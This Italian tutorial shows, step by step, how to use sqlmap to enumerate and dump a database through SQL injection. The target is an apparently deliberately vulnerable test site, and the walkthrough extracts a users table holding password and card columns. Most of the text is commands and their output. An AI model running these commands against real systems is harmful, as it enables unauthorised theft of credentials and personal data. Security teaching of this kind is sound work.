Nessun risultato. Prova con un altro termine.
Guide
Notizie
Software
Tutorial

Tecniche di enumerazione database con sqlmap

Scopriamo come enumerare database e tabelle con sqlmap
Scopriamo come enumerare database e tabelle con sqlmap
Link copiato negli appunti

Enumerazione database con sqlmap

Vedremo ora qualche tecnica di enumerazione per estrarre informazioni utili dal database.
Se volessimo estrarre maggiori informazioni sui servizi ai quale è connessa la nostra web application potremmo utilizzare le opzioni:

  • --banner
  • --fingerprint

Analogamente per ottenere la lista degli utenti e password:

  • --users
  • --passwords

Per verificare se l'utente è un amministratore:

--is-dba

NOTA - non sempre tutte queste informazione sono accessibili. Vedremo ora come estrarre passo dopo passo il contenuto del database. Si procede specificando l'opzione "--dbs" per ottenere la lista dei database disponibili:

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql --dbs
...

[12:47:32] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:47:32] [INFO] fetching database names 
[12:47:32] [INFO] the SQL query used returns 3 entries 
[12:47:33] [INFO] retrieved: information_schema 
[12:47:33] [INFO] retrieved: acuart 
[12:47:33] [INFO] retrieved: modrewriteShop 
available databases [3]: 
[*] acuart 
[*] information_schema 
[*] modrewriteShop 

[12:47:33] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:47:33

Per enumerare le tabelle del database "acuart" sarà necessario aggiungere al precedente comando le opzioni "-D acuart --tables":

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart --tables
[...]

[12:48:46] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:48:46] [INFO] fetching tables for database 'acuart' 
[12:48:46] [INFO] the SQL query used returns 7 entries 
[12:48:46] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: artists 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: carts 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: categ 
[12:48:47] [INFO] retrieved: acuart 
[12:48:47] [INFO] retrieved: featured 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: guestbook 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: pictures 
[12:48:48] [INFO] retrieved: acuart 
[12:48:48] [INFO] retrieved: users 
Database: acuart 
[7 tables] 
+-----------+ 
| artists   | 
| carts     | 
| categ     | 
| featured  | 
| guestbook | 
| pictures  | 
| users     | 
+-----------+ 

[12:48:48] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:48:48

Ora è possibile ottenere il listato delle colonne con l'opzione "--columns":

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --columns
[...]

[12:49:27] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:49:27] [INFO] fetching columns for table 'users' on database 'acuart' 
[12:49:27] [INFO] the SQL query used returns 8 entries 
[12:49:28] [INFO] retrieved: uname 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: pass 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: cc 
[12:49:28] [INFO] retrieved: varchar(100) 
[12:49:28] [INFO] retrieved: address 
[12:49:29] [INFO] retrieved: mediumtext 
[12:49:29] [INFO] retrieved: email 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:29] [INFO] retrieved: name 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:29] [INFO] retrieved: phone 
[12:49:29] [INFO] retrieved: varchar(100) 
[12:49:30] [INFO] retrieved: cart 
[12:49:30] [INFO] retrieved: varchar(100) 
Database: acuart 
Table: users 
[8 columns] 
+---------+--------------+ 
| Column  | Type         | 
+---------+--------------+ 
| address | mediumtext   | 
| cart    | varchar(100) | 
| cc      | varchar(100) | 
| email   | varchar(100) | 
| name    | varchar(100) | 
| pass    | varchar(100) | 
| phone   | varchar(100) | 
| uname   | varchar(100) | 
+---------+--------------+ 

[12:49:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:49:30

Infine recupereremo il contenuto del database limitandoci alle prime due tuple con l'opzione "--dump --start 1 --stop 3" :

user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --dump --start 1 --stop 5
[...]

[12:59:19] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) 
web application technology: Apache 2.0.55, PHP 5.1.2 
back-end DBMS: MySQL 5.0 
[12:59:19] [INFO] fetching columns for table 'users' on database 'acuart' 
[12:59:19] [INFO] the SQL query used returns 8 entries 
[12:59:20] [INFO] retrieved: uname 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: pass 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: cc 
[12:59:20] [INFO] retrieved: varchar(100) 
[12:59:20] [INFO] retrieved: address 
[12:59:21] [INFO] retrieved: mediumtext 
[12:59:21] [INFO] retrieved: email 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:21] [INFO] retrieved: name 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:21] [INFO] retrieved: phone 
[12:59:21] [INFO] retrieved: varchar(100) 
[12:59:22] [INFO] retrieved: cart 
[12:59:22] [INFO] retrieved: varchar(100) 
[12:59:22] [INFO] fetching entries for table 'users' on database 'acuart' 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: cacucko 
[12:59:22] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: hacked by cacucko! 
[12:59:23] [INFO] retrieved: Russian hackers! 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:23] [INFO] retrieved: gopala 
[12:59:24] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa 
[12:59:24] [INFO] retrieved: test 
[12:59:24] [INFO] retrieved: gopala 
[12:59:24] [INFO] retrieved: gopala 
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n 
Database: acuart 
Table: users 
[2 entries] 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 
| address            | cart                             | cc      | email            | name    | pass   | phone   | uname  | 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 
| hacked by cacucko! | 1b90caf669e05660efdf1d23b48100fa | cacucko | Russian hackers! | cacucko | gopala | cacucko | gopala | 
| gopala             | 1b90caf669e05660efdf1d23b48100fa | gopala  | gopala           | gopala  | gopala | gopala  | test   | 
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ 

[12:59:30] [INFO] Table 'acuart.users' dumped to CSV file '/home/user/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' 
[12:59:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' 

[*] shutting down at: 12:59:30

Ti consigliamo anche